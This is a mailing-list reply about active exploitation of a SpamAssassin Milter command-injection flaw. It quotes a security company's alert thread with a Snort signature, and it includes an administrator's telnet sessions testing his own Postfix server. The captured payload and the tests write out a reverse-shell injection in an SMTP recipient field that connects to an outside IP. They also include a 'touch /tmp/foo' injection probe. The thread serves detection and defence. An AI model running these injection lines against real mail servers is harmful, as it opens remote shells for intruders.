Hi, seems OK with Postfix unless I missed something, which is possible.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asd...@klunky.co.uk>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
550 5.1.0 <asd...@klunky.co.uk>: Sender address rejected: User unknown in virtual mailbox table
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asd...@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
550 5.1.0 <asd...@klunky.co.uk>: Sender address rejected: User unknown in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asd...@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/62.58.61.184/45295 1>&0 2>&0">
550 5.1.0 <asd...@klunky.co.uk>: Sender address rejected: User unknown in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.

On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> in case you are using spamassassin milter:
>
> active exploits going on.
>
> <http://seclists.org/fulldisclosure/2010/Mar/140>
> <http://www.securityfocus.com/bid/38578>
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.
>
> -------- Original Message --------
> Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
>
> The rule is only looking for this:
>
> content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
>
> Personally, I would probably block it. Although, if we're not seeing this sort of thing pop up on customers' boxes, a manual block in scanner2 is sufficient for now, right?
>
> Either way, let me know and I'll block/unblock/leave alone.
>
> --
> John Meyer
> Associate Security Engineer
> SECNAP Network Security
> Office: (561) 999-5000 x:1235
> Direct: (561) 948-2264
>
> *From:* Michael Scheidell
> *Sent:* Thursday, February 10, 2011 12:25 PM
> *To:* John Meyer
> *Cc:* Jonathan Scheidell; Anthony Wetula
> *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
>
> is the snort rule specific enough that you can block the offending ip for 5 mins?
>
> (if it's a real smtp server, it will retry) and legit email through.
>
> On 2/10/11 12:12 PM, John Meyer wrote:
>
> I don't like the looks of this. I blocked that IP with samtool.
>
> Payload:
>
> rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
> data
> .
> quit
>
> --
> John Meyer
> Associate Security Engineer
> SECNAP Network Security
> Office: (561) 999-5000 x:1235
> Direct: (561) 948-2264
>
> *From:* SECNAP Network Security
> *Sent:* Thursday, February 10, 2011 12:01 PM
> *To:* security-al...@scanner2.secnap.com
> *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
>
> 02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
> [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
> [Classification: Attempted User Privilege Gain] [Priority: 1]
>
> --
> Michael Scheidell, CTO
> o: 561-999-5000
> d: 561-948-2259
> ISN: 1259*1300
> SECNAP Network Security Corporation
>
> · Certified SNORT Integrator
> · 2008-9 Hot Company Award Winner, World Executive Alliance
> · Five-Star Partner Program 2009, VARBusiness
> · Best in Email Security, 2010: Network Products Guide
> · King of Spam Filters, SC Magazine 2008
>
> ------------------------------------------------------------------------
> This email has been scanned and certified safe by SpammerTrap®.
> For Information please see http://www.secnap.com/products/spammertrap/
> ------------------------------------------------------------------------